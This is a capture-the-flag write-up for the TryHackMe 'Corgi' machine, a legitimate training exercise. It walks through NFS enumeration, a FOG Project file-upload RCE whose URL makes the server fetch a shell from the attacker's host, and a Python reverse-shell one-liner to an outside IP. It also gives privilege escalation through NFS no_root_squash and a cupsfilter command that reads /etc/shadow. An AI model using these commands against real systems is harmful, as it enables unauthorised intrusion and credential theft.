TryHackMe-Corgi

NMAP

21/tcp    open  ftp       syn-ack ttl 63 vsftpd 3.0.3
22/tcp    open  ssh       syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                            
80/tcp    open  http      syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:                                                           
|_  Supported Methods: GET POST OPTIONS HEAD                              
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp   open  rpcbind   syn-ack ttl 63 2-4 (RPC #100000)
443/tcp   open  ssl/https syn-ack ttl 63 Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2049/tcp  open  nfs_acl   syn-ack ttl 63 3 (RPC #100227)
3306/tcp  open  mysql     syn-ack ttl 63 MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
|   Thread ID: 89
|   Capabilities flags: 63487
|   Some Capabilities: InteractiveClient, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, Support41Auth, Speaks41ProtocolOld, SupportsTransaction
s, LongPassword, SupportsLoadDataLocal, IgnoreSigpipes, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, Speaks41ProtocolNe
w, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: ;sV4=wbeUX:W*gL$m{Bs
|_  Auth Plugin Name: mysql_native_password
42493/tcp open  nlockmgr  syn-ack ttl 63 1-4 (RPC #100021)
57597/tcp open  mountd    syn-ack ttl 63 1-3 (RPC #100005)
58527/tcp open  mountd    syn-ack ttl 63 1-3 (RPC #100005)
60677/tcp open  mountd    syn-ack ttl 63 1-3 (RPC #100005)

PORT 2049 (NFS)

Since nfs is enabled we can see if there's are share available for us to mount , and running showmount will show which shares are available

We can now mount this using the mount command

If we navigate into folders we can see a fog file and we can see that there's something called fog project

<img src=”https://imgur.com/xKcwqmK.png"./>

We can serch for default creds for fog which are fog:password

Searching for exploits on google we do find one for File Upload RCE

Foothold

So let’s follow the steps to get remote code execution , first we need to create an empty file using the command show in the exploit

Make a variable named cmd which will save the value coming form the GET parameter named cmd and that command will be executed with system function , basically running any shell command

Then we have to server this file by hosting it on our machine and we need to include that request (http://ip/myshell) in base64 encoded form in a GET parameter named file of fog url

http://10.10.39.253:443/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzAuOC45NC42MC9teXNoZWxsCg==&arch=arm64

After making that request a confirmation will be show to install the kernel module

Here we need to change kernel name from bzImage32 to myshell.php

Navigating to /fog/service/ipxe/myshell.php?cmd=id

We will have rce from which we can get a revere shell

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.94.60",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Stabilizing the shell

Rabbit hole

We can find fog database password from /opt/fog/.fogsettings

There’s also another set of credentials but I am not sure for which service it’s for but there is a user named fogproject so let's try for this user

This indeed was the right password but it immediately shows a message and brings us back to www-data shell , but we can actually runs commands as this user through su fogproject -c id

I tried to get sh shell instead of bash and it worked

But I couldn’t do much from this user , so I went on and looked at the kernel version

Now at this point I am not gonna lie I got into a rabbit hole and tried to exploit the kernel version but couldn’t get any of the exploits to work as all failed at finding subuid (don’t know what it means )

Privilege Escalation (1st method)

I should have run linpeas from the start and it would have saved my time because as I ran linpeas and found that no_squash_root was enabled

And this could be a security issue , by default on nfs share ,it we mount the share and whatever changes that we make in that share like uploading files or writing files it will be owned as nfsnobody or nobody even tho we are root on our host machine but if no_root_squash is enabled , whatever changes we make or upload any files that will be owned as root on the actual target machine so we can mount the share , copy the bash from our machine and make it a SUID , and that file will also be shown as being SUID binary owned by root on the actual machine (target machine)

So in order to see which share we have write access , we can read the /etc/exports file on the target machine

Let’s mount /images/dev share again

Here what I have done is , mounted the share and in that share created a c program file which will set the SUID to 0 (which is for root user) and spawn the bash shell . After compiling the file we have to make that binary a SUID because when this binary executes it will be executed as a root user

Also to note that I had tried copying the bash binary , making it a SUID and then executing it but it didn’t work as it was throwing an error related loading shared library

Privilege Escalation (2nd method)

Checking the SUID binaries , we will find a binary named cupsfilter

CUPS in linux is used as a printing service in linux for printing files and cupsfilter is used for converting a file to a specific format , after the file is converting it sends the output to standard output , on to the screen. So we can abuse this by going to GTFOBINS

Running /usr/sbin/cupsfilter -i application/octet-stream -m application/octet-stream /etc/shadow

This will print the shadow file which holds all user’s password hashses, in this way we can read the root flag as well but we won’t get a shell through this method as we can only read files and since there’s no ssh key in root user’s .ssh directory we can’t do much from here

References

• https://www.exploit-db.com/exploits/49811
• https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
• https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
• https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/security_guide/s2-server-nfs-noroot
• https://man7.org/linux/man-pages/man8/cupsfilter.8.html
• https://gtfobins.github.io/gtfobins/cupsfilter/